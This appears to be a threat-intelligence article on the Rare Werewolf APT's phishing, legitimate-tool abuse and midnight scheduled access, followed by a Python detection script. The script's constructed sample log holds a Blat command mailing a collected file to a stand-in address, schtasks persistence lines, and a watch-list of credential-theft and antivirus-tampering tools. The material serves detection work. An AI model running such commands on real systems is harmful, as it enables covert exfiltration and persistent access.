Rare Werewolf APT: A New Era of Cyber Threats
Introduction to Rare Werewolf
The cyber landscape is constantly evolving, and one of the players drawing attention is the threat actor known as Rare Werewolf. Previously referred to as Rare Wolf, this group has gained notoriety for a series of targeted attacks against entities in Russia and neighboring countries of the Commonwealth of Independent States (CIS). According to security experts at Kaspersky, this group represents an advanced persistent threat (APT) that relies on legitimate software to carry out its operations.
Attack Methodology
What sets Rare Werewolf apart is its preference for legitimate third-party applications over custom malicious software. Because the tools themselves are benign and widely used, this strategy often complicates detection and mitigation efforts. The group relies on command scripts and PowerShell scripts to deliver the malicious functionality. These scripts establish remote access to compromised systems, enabling the attackers to siphon credentials and deploy XMRig cryptocurrency miners.
Target Demographics
The impact of Rare Werewolf’s activities has been broad, affecting hundreds of users across various sectors in Russia, especially in industrial enterprises and educational institutions focused on engineering. There have also been a smaller number of reported infections in Belarus and Kazakhstan. The group is believed to have been active since at least 2019, underscoring its persistence and adaptability to evolving security measures.
Phishing as an Attack Vector
A significant aspect of Rare Werewolf’s approach is its reliance on phishing emails to gain initial access. These emails are often bundled with password-protected archives that contain executable files designed to kickstart the infection process. Cybersecurity experts from BI.ZONE noted that the attack’s initiation typically occurs through these deceptive communications, which can compromise sensitive information.
Tools of the Trade
The threat actors frequently deploy legitimate tools—such as Mipko Employee Monitor and WebBrowserPassView—to exploit infected systems for password harvesting and to disable antivirus protections. In the most recent attacks recorded by Kaspersky, these tools were discovered within a malware delivery system characterized by password-protected archives, which also include decoy documents designed to masquerade as legitimate transactions.
A tool such as 4t Tray Minimizer serves to further obscure the attackers' activity: it lets them minimize running applications to the system tray, so their windows are not visible on the desktop while the operation is under way.
Escalating the Attack
Once access is gained, the attackers fetch additional files from a remote server, which may include Defender Control and Blat, a utility designed to send stolen data through SMTP to an email controlled by the attackers. The methodology also comprises employing AnyDesk, a remote desktop application. A Windows batch file is instrumental in ensuring continuous access and data extraction by scheduling tasks that open a window for attackers to exploit the affected systems.
This batch script includes a PowerShell component that enables it to wake the victim’s machine automatically at local midnight for four hours of uninterrupted access before shutting down again at 5 a.m. This scheduling tactic showcases the thorough planning that goes into these attacks, highlighting how attackers can remain undetected for extended periods.
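As an added example, not code from the article or from Kaspersky or BI.ZONE, the following Python triage script scans process-creation log lines for the tradecraft described above: the product names of the tools the group abuses, and scheduled tasks created with a start time of local midnight or 05:00. The log format, host names, paths and the watch-list strings are assumptions; the sample events are constructed for the example.

```python
import re
from typing import Dict, List

# Product names the article reports Rare Werewolf abusing. Matching is on the
# product name inside the command line; real binary names are not assumed.
WATCHLIST = {
    "blat": "Blat: SMTP exfiltration of collected data",
    "anydesk": "AnyDesk: remote access",
    "webbrowserpassview": "WebBrowserPassView: browser credential harvesting",
    "defender control": "Defender Control: antivirus tampering",
    "4t tray minimizer": "4t Tray Minimizer: hiding windows in the tray",
    "mipko": "Mipko Employee Monitor: user monitoring",
    "xmrig": "XMRig: cryptocurrency mining",
}
# Start hours the article reports: wake-up at local midnight, shutdown at 05:00.
SUSPECT_START_HOURS = {0: "task starts at local midnight (reported wake-up time)",
                       5: "task starts at 05:00 (reported shutdown time)"}

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')  # key=value or key="quoted value"
START_RE = re.compile(r'/st\s+(\d{1,2}):\d{2}')     # schtasks /st HH:MM

def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed process-creation log line into a field dict."""
    return {k: (q if raw.startswith('"') else raw) for k, raw, q in FIELD_RE.findall(line)}

def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons a single event matches the reported tradecraft."""
    cmd = event.get("cmdline", "").lower()
    reasons = [label for needle, label in WATCHLIST.items() if needle in cmd]
    if "schtasks" in cmd and "/create" in cmd:
        m = START_RE.search(cmd)
        if m and int(m.group(1)) in SUSPECT_START_HOURS:
            reasons.append(SUSPECT_START_HOURS[int(m.group(1))])
    return reasons

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run assess() over every line and keep only the events that matched."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        reasons = assess(ev)
        if reasons:
            hits.append({"host": ev.get("host"), "cmdline": ev.get("cmdline"), "reasons": reasons})
    return hits

# Constructed sample events (not real telemetry); hosts, users and paths are illustrative.
SAMPLE_LOG = [
    r'2024-05-01 09:12:03 host=ENG-PC07 user=ivanov image=C:\Windows\System32\schtasks.exe cmdline="schtasks /create /tn Updater /tr C:\ProgramData\up.bat /sc daily /st 00:00"',
    r'2024-05-01 09:12:09 host=ENG-PC07 user=ivanov image=C:\Windows\System32\schtasks.exe cmdline="schtasks /create /tn Cleanup /tr C:\ProgramData\off.bat /sc daily /st 05:00"',
    r'2024-05-01 09:15:41 host=ENG-PC07 user=ivanov image=C:\Windows\System32\cmd.exe cmdline="cmd /c C:\ProgramData\blat.exe C:\ProgramData\out.txt -to drop@example.org -server smtp.example.org"',
    r'2024-05-01 10:02:17 host=ENG-PC07 user=ivanov image=C:\Windows\System32\notepad.exe cmdline="notepad.exe C:\Users\ivanov\notes.txt"',
    r'2024-05-01 10:40:55 host=ENG-PC12 user=petrov image=C:\Users\petrov\AppData\Roaming\AnyDesk.exe cmdline="AnyDesk.exe"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["host"], "|", hit["cmdline"], "|", "; ".join(hit["reasons"]))
```

A single match on a remote-access or mail tool is not proof of compromise on its own; the combination of a midnight task, a 05:00 task and a mail or remote-access tool on the same host is what mirrors the reported pattern.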
Broader Cybercriminal Activities
The risks posed by Rare Werewolf are compounded by the emergence of other cybercrime groups such as DarkGaboon, which is also targeting Russian organizations using LockBit 3.0 ransomware. DarkGaboon has been noted for its independent operations, utilizing phishing emails that contain malicious executable files. Similar to Rare Werewolf, DarkGaboon aims to blend into broader cybercriminal ecosystems, making it challenging to pin down specific origins and affiliations of these attacks.
Conclusion
As cyber threats continue to escalate, the actions of groups like Rare Werewolf and DarkGaboon underline the ever-evolving tactics of cybercriminals. By leveraging legitimate software and sophisticated phishing techniques, these APTs not only impact individual victims but also expose vulnerabilities across entire sectors. Awareness and proactive measures are critical in combating these rising threats and bolstering cybersecurity defenses effectively.